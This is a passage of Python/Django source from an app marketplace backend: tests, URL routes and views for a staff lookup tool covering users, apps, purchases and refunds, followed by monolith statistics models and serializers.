        res = self.summary()
        eq_(pq(res.content)('section.column-b button.button,disabled')
            .attr('name'), 'prioritize')
        eq_(pq(res.content)('section.column-b button.button,disabled').text(),
            'Review Prioritized')

    def test_priority_button_works(self):
        staff = UserProfile.objects.get(username='support_staff')
        req = req_factory_factory(self.url, post=True, user=staff,
                                  data={'prioritize': 'true'})
        app_summary(req, self.app.id)
        self.app.reload()
        eq_(self.app.priority_review, True)

    @mock.patch.object(settings, 'PAYMENT_PROVIDERS', ['bango', 'boku'])
    def test_multiple_payment_accounts(self):
        self.add_payment_accounts([PROVIDER_BANGO, PROVIDER_BOKU])
        res = self.summary()
        self.verify_bango_boku_portals(self.app, res)
class TestAppSummaryPurchases(AppSummaryTest):
    """Tests for the purchase totals shown on the app summary page."""

    def setUp(self):
        super(TestAppSummaryPurchases, self).setUp()
        self._setUp()

    def assert_totals(self, data):
        """Assert totals matching three 2.00-USD + three 1.00-EUR buys."""
        eq_(data['total'], 6)
        six_bucks = numbers.format_currency(6, 'USD',
                                            locale=numbers.LC_NUMERIC)
        three_euro = numbers.format_currency(3, 'EUR',
                                             locale=numbers.LC_NUMERIC)
        eq_(set(data['amounts']), set([six_bucks, three_euro]))
        eq_(len(data['amounts']), 2)

    def assert_empty(self, data):
        """Assert the bucket contains no purchases at all."""
        eq_(data['total'], 0)
        eq_(sorted(data['amounts']), [])

    def purchase(self, created=None, typ=amo.CONTRIB_PURCHASE):
        """Create 3 USD and 3 EUR contributions, optionally back-dated."""
        for curr, amount in (('USD', '2.00'), ('EUR', '1.00')):
            for i in range(3):
                c = Contribution.objects.create(addon=self.app,
                                                user=self.user,
                                                amount=Decimal(amount),
                                                currency=curr,
                                                type=typ)
        if created:
            c.update(created=created)

    def test_24_hr(self):
        self.purchase()
        res = self.summary()
        self.assert_totals(res.context['purchases']['last_24_hours'])

    def test_ignore_older_than_24_hr(self):
        self.purchase(created=datetime.now() - timedelta(days=1,
                                                         minutes=1))
        res = self.summary()
        self.assert_empty(res.context['purchases']['last_24_hours'])

    def test_7_days(self):
        self.purchase(created=datetime.now() - timedelta(days=6,
                                                         minutes=55))
        res = self.summary()
        self.assert_totals(res.context['purchases']['last_7_days'])

    def test_ignore_older_than_7_days(self):
        self.purchase(created=datetime.now() - timedelta(days=7,
                                                         minutes=1))
        res = self.summary()
        self.assert_empty(res.context['purchases']['last_7_days'])

    def test_alltime(self):
        self.purchase(created=datetime.now() - timedelta(days=31))
        res = self.summary()
        self.assert_totals(res.context['purchases']['alltime'])

    def test_ignore_non_purchases(self):
        for typ in [amo.CONTRIB_REFUND,
                    amo.CONTRIB_CHARGEBACK,
                    amo.CONTRIB_PENDING]:
            self.purchase(typ=typ)
        res = self.summary()
        self.assert_empty(res.context['purchases']['alltime'])
class TestAppSummaryRefunds(AppSummaryTest):
    """Tests for the refund statistics on the app summary page."""

    fixtures = AppSummaryTest.fixtures + fixture('user_999', 'user_admin')

    def setUp(self):
        super(TestAppSummaryRefunds, self).setUp()
        self._setUp()
        self.user = UserProfile.objects.get(username='regularuser')
        self.contrib1 = self.purchase()
        self.contrib2 = self.purchase()
        self.contrib3 = self.purchase()
        self.contrib4 = self.purchase()

    def purchase(self):
        """Create and return a single 0.99 USD purchase contribution."""
        return Contribution.objects.create(addon=self.app,
                                           user=self.user,
                                           amount=Decimal('0.99'),
                                           currency='USD',
                                           paykey='AP-1235',
                                           type=amo.CONTRIB_PURCHASE)

    def refund(self, refunds):
        """Create a Refund per (contribution, status) pair in *refunds*."""
        for contrib, status in refunds:
            Refund.objects.create(contribution=contrib,
                                  status=status,
                                  user=self.user)

    def test_requested(self):
        self.refund(((self.contrib1, amo.REFUND_APPROVED),
                     (self.contrib2, amo.REFUND_APPROVED),
                     (self.contrib3, amo.REFUND_DECLINED),
                     (self.contrib4, amo.REFUND_DECLINED)))
        res = self.summary()
        eq_(res.context['refunds']['requested'], 2)
        eq_(res.context['refunds']['percent_of_purchases'], '50.0%')

    def test_no_refunds(self):
        res = self.summary()
        eq_(res.context['refunds']['requested'], 0)
        eq_(res.context['refunds']['percent_of_purchases'], '0.0%')
        eq_(res.context['refunds']['auto-approved'], 0)
        eq_(res.context['refunds']['approved'], 0)
        eq_(res.context['refunds']['rejected'], 0)

    def test_auto_approved(self):
        self.refund(((self.contrib1, amo.REFUND_APPROVED),
                     (self.contrib2, amo.REFUND_APPROVED_INSTANT)))
        res = self.summary()
        eq_(res.context['refunds']['auto-approved'], 1)

    def test_approved(self):
        self.refund(((self.contrib1, amo.REFUND_APPROVED),
                     (self.contrib2, amo.REFUND_DECLINED)))
        res = self.summary()
        eq_(res.context['refunds']['approved'], 1)

    def test_rejected(self):
        # Both declined and failed refunds count as rejected.
        self.refund(((self.contrib1, amo.REFUND_APPROVED),
                     (self.contrib2, amo.REFUND_DECLINED),
                     (self.contrib3, amo.REFUND_FAILED)))
        res = self.summary()
        eq_(res.context['refunds']['rejected'], 2)
class TestPurchases(amo.tests.TestCase):
    """Tests for the per-user purchases page (lookup.user_purchases)."""

    fixtures = ['base/users'] + fixture('webapp_337141')

    def setUp(self):
        # NOTE(review): no super().setUp() call here, unlike most sibling
        # classes — confirm whether that is intentional.
        self.app = Webapp.objects.get(pk=337141)
        self.reviewer = UserProfile.objects.get(username='admin')
        self.user = UserProfile.objects.get(username='regularuser')
        self.url = reverse('lookup.user_purchases', args=[self.user.pk])

    def test_not_allowed(self):
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))

    def test_not_even_mine(self):
        # Users cannot view even their own purchases via this admin page.
        self.client.login(username=self.user.email, password='password')
        eq_(self.client.get(self.url).status_code, 403)

    def test_access(self):
        self.client.login(username=self.reviewer.email, password='password')
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(pq(res.content)('p.notice').length, 1)

    def test_purchase_shows_up(self):
        Contribution.objects.create(user=self.user, addon=self.app,
                                    amount=1, type=amo.CONTRIB_PURCHASE)
        self.client.login(username=self.reviewer.email, password='password')
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        doc = pq(res.content)
        eq_(doc('div.product-lookup-list a').attr('href'),
            self.app.get_detail_url())

    def test_no_support_link(self):
        for type_ in [amo.CONTRIB_PURCHASE]:
            Contribution.objects.create(user=self.user, addon=self.app,
                                        amount=1, type=type_)
        self.client.login(username=self.reviewer.email, password='password')
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        doc = pq(res.content)
        eq_(len(doc('.item a.request-support')), 0)
class TestActivity(amo.tests.TestCase):
    """Tests for the per-user activity-log page (lookup.user_activity)."""

    fixtures = ['base/users'] + fixture('webapp_337141')

    def setUp(self):
        # NOTE(review): no super().setUp() call here, unlike most sibling
        # classes — confirm whether that is intentional.
        self.app = Webapp.objects.get(pk=337141)
        self.reviewer = UserProfile.objects.get(username='admin')
        self.user = UserProfile.objects.get(username='regularuser')
        self.url = reverse('lookup.user_activity', args=[self.user.pk])

    def test_not_allowed(self):
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))

    def test_not_even_mine(self):
        self.client.login(username=self.user.email, password='password')
        eq_(self.client.get(self.url).status_code, 403)

    def test_access(self):
        self.client.login(username=self.reviewer.email, password='password')
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(len(pq(res.content)('.simple-log div')), 0)

    def test_log(self):
        # Viewing the page itself is recorded in the activity log.
        self.client.login(username=self.reviewer.email, password='password')
        self.client.get(self.url)
        log_item = ActivityLog.objects.get(action=amo.LOG.ADMIN_VIEWED_LOG.id)
        eq_(len(log_item.arguments), 1)
        eq_(log_item.arguments[0].id, self.reviewer.id)
        eq_(log_item.user, self.user)

    def test_display(self):
        amo.log(amo.LOG.PURCHASE_ADDON, self.app, user=self.user)
        amo.log(amo.LOG.ADMIN_USER_EDITED, self.user, 'spite', user=self.user)
        self.client.login(username=self.reviewer.email, password='password')
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        doc = pq(res.content)
        assert 'purchased' in doc('li.item').eq(0).text()
        assert 'edited' in doc('li.item').eq(1).text()
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from . import views
# URL routes for the reviewer "lookup" tool (users, apps, transactions).
# These views all start with user ID.
user_patterns = patterns('',
    url(r'^summary$', views.user_summary, name='lookup.user_summary'),
    url(r'^purchases$', views.user_purchases,
        name='lookup.user_purchases'),
    url(r'^activity$', views.user_activity, name='lookup.user_activity'),
    url(r'^delete$', views.user_delete, name='lookup.user_delete'),
)
# These views all start with app/addon ID.
app_patterns = patterns('',
    url(r'^summary$', views.app_summary, name='lookup.app_summary'),
)
# These views all start with transaction ID.
transaction_patterns = patterns('',
    url(r'^refund$', views.transaction_refund,
        name='lookup.transaction_refund'),
    url(r'^summary$', views.transaction_summary,
        name='lookup.transaction_summary'),
)
urlpatterns = patterns('',
    url(r'^$', views.home, name='lookup.home'),
    # Jump straight to a Bango portal by payment package id.
    url(r'^bango-portal/(?P<package_id>[^/]+)/$',
        views.bango_portal_from_package,
        name='lookup.bango_portal_from_package'),
    # JSON endpoints backing the search auto-complete widgets.
    url(r'^user_search\.json$', views.user_search,
        name='lookup.user_search'),
    url(r'^transaction_search$', views.transaction_search,
        name='lookup.transaction_search'),
    url(r'^app_search\.json$', views.app_search,
        name='lookup.app_search'),
    (r'^app/(?P<addon_id>[^/]+)/', include(app_patterns)),
    (r'^transaction/(?P<tx_uuid>[^/]+)/', include(transaction_patterns)),
    (r'^user/(?P<user_id>[^/]+)/', include(user_patterns)),
)
########NEW FILE########
__FILENAME__ = views
import hashlib
import json
import uuid
from datetime import datetime, timedelta
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import connection
from django.db.models import Count, Q, Sum
from django.http import Http404, HttpResponseRedirect
from django.shortcuts import get_object_or_404, redirect, render
import commonware.log
from babel import numbers
from elasticutils.contrib.django import S
from slumber.exceptions import HttpClientError, HttpServerError
from tower import ugettext as _
import amo
import mkt.constants.lookup as lkp
from amo.decorators import (json_view, login_required, permission_required,
post_required)
from amo.utils import paginate
from apps.access import acl
from devhub.models import ActivityLog
from lib.pay_server import client
from mkt.account.utils import purchase_list
from mkt.comm.utils import create_comm_note
from mkt.constants import comm
from mkt.constants.payments import COMPLETED, FAILED, PENDING, REFUND_STATUSES
from mkt.developers.models import AddonPaymentAccount
from mkt.developers.providers import get_provider
from mkt.developers.views_payments import _redirect_to_bango_portal
from mkt.lookup.forms import (DeleteUserForm, TransactionRefundForm,
TransactionSearchForm)
from mkt.lookup.tasks import (email_buyer_refund_approved,
email_buyer_refund_pending)
from mkt.site import messages
from mkt.webapps.models import Webapp, WebappIndexer
from mkt.prices.models import AddonPaymentData, Refund
from stats.models import Contribution
from users.models import UserProfile
# Module-level logger for the lookup views.
log = commonware.log.getLogger('z.lookup')
@login_required
@permission_required('Lookup', 'View')
def home(request):
    """Render the lookup landing page with an empty transaction search."""
    context = {'tx_form': TransactionSearchForm()}
    return render(request, 'lookup/home.html', context)
@login_required
@permission_required('AccountLookup', 'View')
def user_summary(request, user_id):
    """Overview page for one user: their apps, refunds, and payment info."""
    user = get_object_or_404(UserProfile, pk=user_id)
    is_admin = acl.action_allowed(request, 'Users', 'Edit')
    app_summary = _app_summary(user.pk)
    # All refunds that this user has requested (probably as a consumer).
    req = Refund.objects.filter(contribution__user=user)
    # All instantly-approved refunds that this user has requested.
    appr = req.filter(status=amo.REFUND_APPROVED_INSTANT)
    refund_summary = {'approved': appr.count(),
                      'requested': req.count()}
    # TODO: This should return all `addon` types and not just webapps.
    # -- currently get_details_url() fails on non-webapps so this is a
    # temp fix.
    user_addons = (user.addons.filter(type=amo.ADDON_WEBAPP)
                              .order_by('-created'))
    user_addons = paginate(request, user_addons, per_page=15)
    paypal_ids = set(user.addons.exclude(paypal_id='')
                                .values_list('paypal_id', flat=True))
    # Distinct billing addresses across all of the user's apps.
    payment_data = (AddonPaymentData.objects.filter(addon__authors=user)
                    .values(*AddonPaymentData.address_fields())
                    .distinct())
    # If the user is deleted, get the log detailing the delete.
    try:
        delete_log = ActivityLog.objects.for_user(user).filter(
            action=amo.LOG.DELETE_USER_LOOKUP.id)[0]
    except IndexError:
        delete_log = None
    provider_portals = get_payment_provider_portals(user=user)
    return render(request, 'lookup/user_summary.html',
                  {'account': user, 'app_summary': app_summary,
                   'delete_form': DeleteUserForm(), 'delete_log': delete_log,
                   'is_admin': is_admin, 'refund_summary': refund_summary,
                   'user_addons': user_addons, 'payment_data': payment_data,
                   'paypal_ids': paypal_ids,
                   'provider_portals': provider_portals})
@login_required
@permission_required('AccountLookup', 'View')
def user_delete(request, user_id):
    """Soft-delete a user from the lookup UI, logging the stated reason."""
    delete_form = DeleteUserForm(request.POST)
    if not delete_form.is_valid():
        messages.error(request, delete_form.errors)
        return HttpResponseRedirect(reverse('lookup.user_summary',
                                            args=[user_id]))
    user = get_object_or_404(UserProfile, pk=user_id)
    user.deleted = True
    user.save()  # Must call the save function to delete user.
    # Keep an audit trail of who deleted the account and why.
    amo.log(amo.LOG.DELETE_USER_LOOKUP, user,
            details={'reason': delete_form.cleaned_data['delete_reason']},
            user=request.amo_user)
    return HttpResponseRedirect(reverse('lookup.user_summary', args=[user_id]))
@login_required
@permission_required('Transaction', 'View')
def transaction_summary(request, tx_uuid):
    """Show the summary page for a single transaction, looked up by uuid."""
    tx_data = _transaction_summary(tx_uuid)
    if not tx_data:
        raise Http404
    context = {'uuid': tx_uuid,
               'tx_form': TransactionSearchForm(),
               'tx_refund_form': TransactionRefundForm()}
    # Transaction details take precedence over the base keys.
    context.update(tx_data)
    return render(request, 'lookup/transaction_summary.html', context)
def _transaction_summary(tx_uuid):
    """Get transaction details from Solitude API.

    Combines local Contribution data with the live refund status fetched
    from the Bango endpoint when a refund is pending.
    """
    contrib = get_object_or_404(Contribution, uuid=tx_uuid)
    refund_contribs = contrib.get_refund_contribs()
    refund_contrib = refund_contribs[0] if refund_contribs.exists() else None
    # Get refund status.
    refund_status = None
    if refund_contrib and refund_contrib.refund.status == amo.REFUND_PENDING:
        try:
            refund_status = REFUND_STATUSES[client.api.bango.refund.status.get(
                data={'uuid': refund_contrib.transaction_id})['status']]
        except HttpServerError:
            # Solitude is down/unreachable; show a placeholder instead.
            refund_status = _('Currently unable to retrieve refund status.')
    return {
        # Solitude data.
        'refund_status': refund_status,
        # Zamboni data.
        'app': contrib.addon,
        'contrib': contrib,
        'related': contrib.related,
        'type': amo.CONTRIB_TYPES.get(contrib.type, _('Incomplete')),
        # Whitelist what is refundable.
        'is_refundable': ((contrib.type == amo.CONTRIB_PURCHASE)
                          and not refund_contrib),
    }
@post_required
@login_required
@permission_required('Transaction', 'Refund')
def transaction_refund(request, tx_uuid):
    """Issue a refund for a purchase transaction through Solitude/Bango.

    On a PENDING or COMPLETED response, a mirror refund Contribution is
    created by cloning the purchase, and a Refund row is enqueued with the
    matching status; the buyer is emailed in both cases.
    """
    contrib = get_object_or_404(Contribution, uuid=tx_uuid,
                                type=amo.CONTRIB_PURCHASE)
    refund_contribs = contrib.get_refund_contribs()
    refund_contrib = refund_contribs[0] if refund_contribs.exists() else None
    if refund_contrib:
        # Guard against double refunds.
        messages.error(request, _('A refund has already been processed.'))
        return redirect(reverse('lookup.transaction_summary', args=[tx_uuid]))
    form = TransactionRefundForm(request.POST)
    if not form.is_valid():
        # Re-render the summary page with the bound (invalid) form.
        return render(request, 'lookup/transaction_summary.html',
                      dict({'uuid': tx_uuid, 'tx_refund_form': form,
                            'tx_form': TransactionSearchForm()}.items() +
                           _transaction_summary(tx_uuid).items()))
    data = {'uuid': contrib.transaction_id,
            'manual': form.cleaned_data['manual']}
    if settings.BANGO_FAKE_REFUNDS:
        # Testing hook: force a particular Bango response code.
        data['fake_response_status'] = {'responseCode':
                                        form.cleaned_data['fake']}
    try:
        res = client.api.bango.refund.post(data)
    except (HttpClientError, HttpServerError):
        # Either doing something not supposed to or Solitude had an issue.
        log.exception('Refund error: %s' % tx_uuid)
        messages.error(
            request,
            _('You cannot make a refund request for this transaction.'))
        return redirect(reverse('lookup.transaction_summary', args=[tx_uuid]))
    if res['status'] in [PENDING, COMPLETED]:
        # Create refund Contribution by cloning the payment Contribution.
        refund_contrib = Contribution.objects.get(id=contrib.id)
        refund_contrib.id = None
        refund_contrib.save()
        refund_contrib.update(
            type=amo.CONTRIB_REFUND, related=contrib,
            uuid=hashlib.md5(str(uuid.uuid4())).hexdigest(),
            amount=-refund_contrib.amount if refund_contrib.amount else None,
            transaction_id=res['uuid'])
    if res['status'] == PENDING:
        # Create pending Refund.
        refund_contrib.enqueue_refund(
            amo.REFUND_PENDING, request.amo_user,
            refund_reason=form.cleaned_data['refund_reason'])
        log.info('Refund pending: %s' % tx_uuid)
        email_buyer_refund_pending(contrib)
        messages.success(
            request, _('Refund for this transaction now pending.'))
    elif res['status'] == COMPLETED:
        # Create approved Refund.
        refund_contrib.enqueue_refund(
            amo.REFUND_APPROVED, request.amo_user,
            refund_reason=form.cleaned_data['refund_reason'])
        log.info('Refund approved: %s' % tx_uuid)
        email_buyer_refund_approved(contrib)
        messages.success(
            request, _('Refund for this transaction successfully approved.'))
    elif res['status'] == FAILED:
        # Bango no like.
        log.error('Refund failed: %s' % tx_uuid)
        messages.error(
            request, _('Refund request for this transaction failed.'))
    return redirect(reverse('lookup.transaction_summary', args=[tx_uuid]))
@login_required
@permission_required('AppLookup', 'View')
def app_summary(request, addon_id):
    """Overview page for one app: authors, price, downloads, sales, refunds.

    A POST with 'prioritize' flags the app for priority review.
    """
    app = get_object_or_404(Webapp.with_deleted, pk=addon_id)
    if 'prioritize' in request.POST and not app.priority_review:
        app.update(priority_review=True)
        msg = u'Priority Review Requested'
        # Create notes and log entries.
        create_comm_note(app, app.latest_version, request.amo_user, msg,
                         note_type=comm.NO_ACTION)
        amo.log(amo.LOG.PRIORITY_REVIEW_REQUESTED, app, app.latest_version,
                created=datetime.now(), details={'comments': msg})
    # Only developers and owners are shown as authors.
    authors = (app.authors.filter(addonuser__role__in=(amo.AUTHOR_ROLE_DEV,
                                                       amo.AUTHOR_ROLE_OWNER))
               .order_by('display_name'))
    if app.premium and app.premium.price:
        price = app.premium.price
    else:
        price = None
    purchases, refunds = _app_purchases_and_refunds(app)
    provider_portals = get_payment_provider_portals(app=app)
    return render(request, 'lookup/app_summary.html',
                  {'abuse_reports': app.abuse_reports.count(), 'app': app,
                   'authors': authors, 'downloads': _app_downloads(app),
                   'purchases': purchases, 'refunds': refunds, 'price': price,
                   'provider_portals': provider_portals})
@login_required
@permission_required('BangoPortal', 'Redirect')
def bango_portal_from_package(request, package_id):
    """Redirect the user into the Bango portal for the given package id."""
    label = 'package_id: %s' % package_id
    response = _redirect_to_bango_portal(package_id, label)
    if 'Location' not in response:
        # Solitude refused the redirect; surface its first error message.
        errors = json.loads(response.content).get('__all__', response.content)
        messages.error(request, errors[0])
        return HttpResponseRedirect(reverse('lookup.home'))
    return HttpResponseRedirect(response['Location'])
@login_required
@permission_required('AccountLookup', 'View')
def user_purchases(request, user_id):
    """Shows the purchase page for another user."""
    account = get_object_or_404(UserProfile, pk=user_id)
    is_admin = acl.action_allowed(request, 'Users', 'Edit')
    products, contributions, listing = purchase_list(request, account, None)
    context = {'pager': products,
               'account': account,
               'is_admin': is_admin,
               'listing_filter': listing,
               'contributions': contributions,
               'single': False,
               'show_link': False}
    return render(request, 'lookup/user_purchases.html', context)
@login_required
@permission_required('AccountLookup', 'View')
def user_activity(request, user_id):
    """Shows the user activity page for another user."""
    user = get_object_or_404(UserProfile, pk=user_id)
    products, contributions, listing = purchase_list(request, user, None)
    is_admin = acl.action_allowed(request, 'Users', 'Edit')
    # Split the activity log into user-visible entries and ones hidden
    # from developers (admin-only).
    user_items = ActivityLog.objects.for_user(user).exclude(
        action__in=amo.LOG_HIDE_DEVELOPER)
    admin_items = ActivityLog.objects.for_user(user).filter(
        action__in=amo.LOG_HIDE_DEVELOPER)
    # Record that this user's log was viewed by staff.
    amo.log(amo.LOG.ADMIN_VIEWED_LOG, request.amo_user, user=user)
    return render(request, 'lookup/user_activity.html',
                  {'pager': products, 'account': user, 'is_admin': is_admin,
                   'listing_filter': listing,
                   'contributions': contributions, 'single': bool(None),
                   'user_items': user_items, 'admin_items': admin_items,
                   'show_link': False})
def _expand_query(q, fields):
query = {}
rules = [
('term', {'value': q, 'boost': 10}),
('match', {'query': q, 'boost': 4, 'type': 'phrase'}),
('match', {'query': q, 'boost': 3}),
('fuzzy', {'value': q, 'boost': 2, 'prefix_length': 4}),
('startswith', {'value': q, 'boost': 1.5}),
]
for k, v in rules:
for field in fields:
query['%s__%s' % (field, k)] = v
return query
@login_required
@permission_required('AccountLookup', 'View')
@json_view
def user_search(request):
    """JSON user search by pk, username, display name, or email substring."""
    results = []
    q = request.GET.get('q', u'').lower().strip()
    search_fields = ('username', 'display_name', 'email')
    fields = ('id',) + search_fields
    if q.isnumeric():
        # A purely numeric query means an exact primary-key lookup.
        # id is added implictly by the ES filter. Add it explicitly:
        qs = UserProfile.objects.filter(pk=q).values(*fields)
    else:
        # Otherwise OR together case-insensitive substring matches.
        qs = UserProfile.objects.all()
        filters = Q()
        for field in search_fields:
            filters = filters | Q(**{'%s__icontains' % field: q})
        qs = qs.filter(filters)
        qs = qs.values(*fields)
        qs = _slice_results(request, qs)
    for user in qs:
        user['url'] = reverse('lookup.user_summary', args=[user['id']])
        user['name'] = user['username']
        results.append(user)
    return {'results': results}
@login_required
@permission_required('Transaction', 'View')
def transaction_search(request):
    """Redirect to a transaction's summary page when the query validates."""
    form = TransactionSearchForm(request.GET)
    if not form.is_valid():
        # Invalid query: re-render the home page with the bound form.
        return render(request, 'lookup/home.html', {'tx_form': form})
    summary_url = reverse('lookup.transaction_summary',
                          args=[form.cleaned_data['q']])
    return redirect(summary_url)
@login_required
@permission_required('AppLookup', 'View')
@json_view
def app_search(request):
    """JSON app search by pk, GUID, or fuzzy name/slug via elasticsearch."""
    results = []
    q = request.GET.get('q', u'').lower().strip()
    fields = ('name', 'app_slug')
    non_es_fields = ['id', 'name__localized_string'] + list(fields)
    if q.isnumeric():
        # A purely numeric query means an exact primary-key lookup.
        qs = (Webapp.objects.filter(pk=q)
              .values(*non_es_fields))
    else:
        # Try to load by GUID:
        qs = (Webapp.objects.filter(guid=q)
              .values(*non_es_fields))
        if not qs.count():
            # No GUID match: fall back to a weighted elasticsearch query.
            qs = (S(WebappIndexer)
                  .query(should=True, **_expand_query(q, fields))
                  .values_dict(*['id'] + list(fields)))
    qs = _slice_results(request, qs)
    for app in qs:
        if 'name__localized_string' in app:
            # This is a result from the database.
            app['url'] = reverse('lookup.app_summary', args=[app['id']])
            app['name'] = app['name__localized_string']
            results.append(app)
        else:
            # This is a result from elasticsearch which returns name as a list.
            app['url'] = reverse('lookup.app_summary', args=[app['id']])
            for field in ('id', 'app_slug'):
                app[field] = app.get(field)
            # Emit one result row per translated name.
            for name in app['name']:
                dd = app.copy()
                dd['name'] = name
                results.append(dd)
    return {'results': results}
def _app_downloads(app):
stats = {'last_7_days': 0,
'last_24_hours': 0,
'alltime': 0}
# Webapps populate these fields via Monolith.
stats['last_24_hours'] = 'N/A'
stats['last_7_days'] = app.weekly_downloads
stats['alltime'] = app.total_downloads
return stats
def _app_summary(user_id):
    """Aggregate a user's app purchases, per currency, via raw SQL.

    Returns {'app_total': <purchase count across all currencies>,
             'app_amount': {currency: summed purchase amount}}.
    """
    sql = """
        select currency,
            sum(case when type=%(purchase)s then 1 else 0 end)
                as app_total,
            sum(case when type=%(purchase)s then amount else 0.0 end)
                as app_amount
        from stats_contributions
        where user_id=%(user_id)s
        group by currency
    """
    cursor = connection.cursor()
    cursor.execute(sql, {'user_id': user_id,
                         'purchase': amo.CONTRIB_PURCHASE})
    summary = {'app_total': 0,
               'app_amount': {}}
    cols = [cd[0] for cd in cursor.description]
    while 1:
        row = cursor.fetchone()
        if not row:
            break
        row = dict(zip(cols, row))
        for cn in cols:
            if cn.endswith('total'):
                # Counts sum across all currencies.
                summary[cn] += row[cn]
            elif cn.endswith('amount'):
                # Amounts are kept per currency (one row per currency).
                summary[cn][row['currency']] = row[cn]
    return summary
def _app_purchases_and_refunds(addon):
    """Compute sales and refund stats for an app's lookup summary page.

    Returns (purchases, refunds): purchases keyed by time window with
    totals and formatted per-currency amounts; refunds keyed by status
    counts plus a percent-of-purchases figure.
    """
    purchases = {}
    now = datetime.now()
    # Anything that counts as a sale: exclude refunds, chargebacks and
    # still-pending contributions.
    base_qs = (Contribution.objects.values('currency')
               .annotate(total=Count('id'),
                         amount=Sum('amount'))
               .filter(addon=addon)
               .exclude(type__in=[amo.CONTRIB_REFUND,
                                  amo.CONTRIB_CHARGEBACK,
                                  amo.CONTRIB_PENDING]))
    for typ, start_date in (('last_24_hours', now - timedelta(hours=24)),
                            ('last_7_days', now - timedelta(days=7)),
                            ('alltime', None),):
        qs = base_qs.all()
        if start_date:
            qs = qs.filter(created__gte=start_date)
        sums = list(qs)
        purchases[typ] = {'total': sum(s['total'] for s in sums),
                          'amounts': [numbers.format_currency(s['amount'],
                                                              s['currency'])
                                      for s in sums if s['currency']]}
    refunds = {}
    rejected_q = Q(status=amo.REFUND_DECLINED) | Q(status=amo.REFUND_FAILED)
    qs = Refund.objects.filter(contribution__addon=addon)
    # "requested" counts everything that wasn't outright rejected.
    refunds['requested'] = qs.exclude(rejected_q).count()
    percent = 0.0
    total = purchases['alltime']['total']
    if total:
        percent = (refunds['requested'] / float(total)) * 100.0
    refunds['percent_of_purchases'] = '%.1f%%' % percent
    refunds['auto-approved'] = (qs.filter(status=amo.REFUND_APPROVED_INSTANT)
                                .count())
    refunds['approved'] = qs.filter(status=amo.REFUND_APPROVED).count()
    refunds['rejected'] = qs.filter(rejected_q).count()
    return purchases, refunds
def _slice_results(request, qs):
    """Cap a queryset/result list at the configured search limit.

    Passing ?all_results=<truthy> raises the cap to MAX_RESULTS; otherwise
    the tighter SEARCH_LIMIT applies.
    """
    if request.GET.get('all_results'):
        limit = lkp.MAX_RESULTS
    else:
        limit = lkp.SEARCH_LIMIT
    return qs[:limit]
def get_payment_provider_portals(app=None, user=None):
    """Return a list of dicts describing payment portals for an app or user.

    Exactly one of *app* or *user* must be given; accounts without a portal
    URL are skipped.
    """
    if app:
        filters = dict(addon=app)
    elif user:
        filters = dict(payment_account__user=user)
    else:
        raise ValueError('user or app is required')
    portals = []
    accounts = (AddonPaymentAccount.objects.filter(**filters)
                .select_related('payment_account'))
    for account in accounts:
        provider = get_provider(id=account.payment_account.provider)
        portal_url = provider.get_portal_url(account.addon.app_slug)
        if portal_url:
            portals.append({
                'provider': provider,
                'app': account.addon,
                'portal_url': portal_url,
                'payment_account': account.payment_account,
            })
    return portals
########NEW FILE########
__FILENAME__ = forms
from django import forms
import happyforms
class MonolithForm(happyforms.Form):
    """Query parameters accepted by the monolith data API.

    All fields are optional: `key` filters by metric name, while
    `start`/`end` bound the recorded-date range.
    """
    key = forms.CharField(required=False)
    start = forms.DateField(required=False)
    end = forms.DateField(required=False)
########NEW FILE########
__FILENAME__ = create_monolith_user
from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand
from mkt.site.management.commands.add_test_users import create_user
class Command(BaseCommand):
    help = """Create an user with access to the monolith API"""
    option_list = BaseCommand.option_list + (
        make_option(
            '--overwrite', action='store_true',
            dest='overwrite', default=False,
            help='Overwrite the user access token if it already exists'),)
    def handle(self, *args, **kw):
        # Delegate to the shared test-user helper; the password comes from
        # settings so each deployment controls the credential.
        create_user('[email protected]',
                    overwrite=kw['overwrite'],
                    password=settings.MONOLITH_PASSWORD,
                    group_name='Monolith API')
########NEW FILE########
__FILENAME__ = models
import datetime
import hashlib
import json
from django.db import models
class MonolithRecord(models.Model):
    """Data stored temporarily for monolith.

    It contains a key (e.g. "app.install"), the date of the record, a user (a
    string representing a unique user) and a value (which internally is stored
    as a JSON object).
    """
    # Metric name, e.g. "app.install".
    key = models.CharField(max_length=255)
    # When the event happened (may be back-dated via record_stat).
    recorded = models.DateTimeField()
    # Anonymized user identifier; see get_user_hash().
    user_hash = models.CharField(max_length=255, blank=True)
    # JSON-encoded payload.
    value = models.TextField()
    class Meta:
        db_table = 'monolith_record'
def get_user_hash(request):
    """Get a hash identifying an user.

    It's a hash of session key, ip and user agent
    """
    ip = request.META.get('REMOTE_ADDR', '')
    # NOTE(review): Django normally stores the UA under 'HTTP_USER_AGENT';
    # 'User-Agent' may always be missing here -- verify against callers.
    ua = request.META.get('User-Agent', '')
    session_key = request.session.session_key or ''
    # NOTE(review): hashing a text string works on Python 2 only; Python 3
    # would require encoding to bytes first.
    return hashlib.sha1('-'.join(map(str, (ip, ua, session_key)))).hexdigest()
def record_stat(key, request, **data):
    """Create a new record in the database with the given values.

    :param key:
        The type of stats you're sending, e.g. "app.install".
    :param request:
        The request associated with this call. It will be used to define who
        the user is.
    :param data:
        The data you want to store, passed as named arguments. A special
        `__recorded` argument overrides the record's timestamp; otherwise
        the current UTC time is used.
    """
    _missing = object()
    recorded = data.pop('__recorded', _missing)
    if recorded is _missing:
        recorded = datetime.datetime.utcnow()
    if not data:
        raise ValueError('You should at least define one value')
    record = MonolithRecord(key=key, user_hash=get_user_hash(request),
                            recorded=recorded, value=json.dumps(data))
    record.save()
    return record
########NEW FILE########
__FILENAME__ = serializers
import json
from rest_framework import serializers
from .models import MonolithRecord
class MonolithSerializer(serializers.ModelSerializer):
    """Serialize MonolithRecord rows, decoding the JSON `value` field."""
    class Meta:
        model = MonolithRecord
        fields = ('key', 'recorded', 'user_hash', 'value')
    def transform_value(self, obj, value):
        # On-the-fly query results already carry a dict here; only decode
        # strings coming from the database.  (`basestring` is Python 2.)
        if not isinstance(value, basestring):
            return value
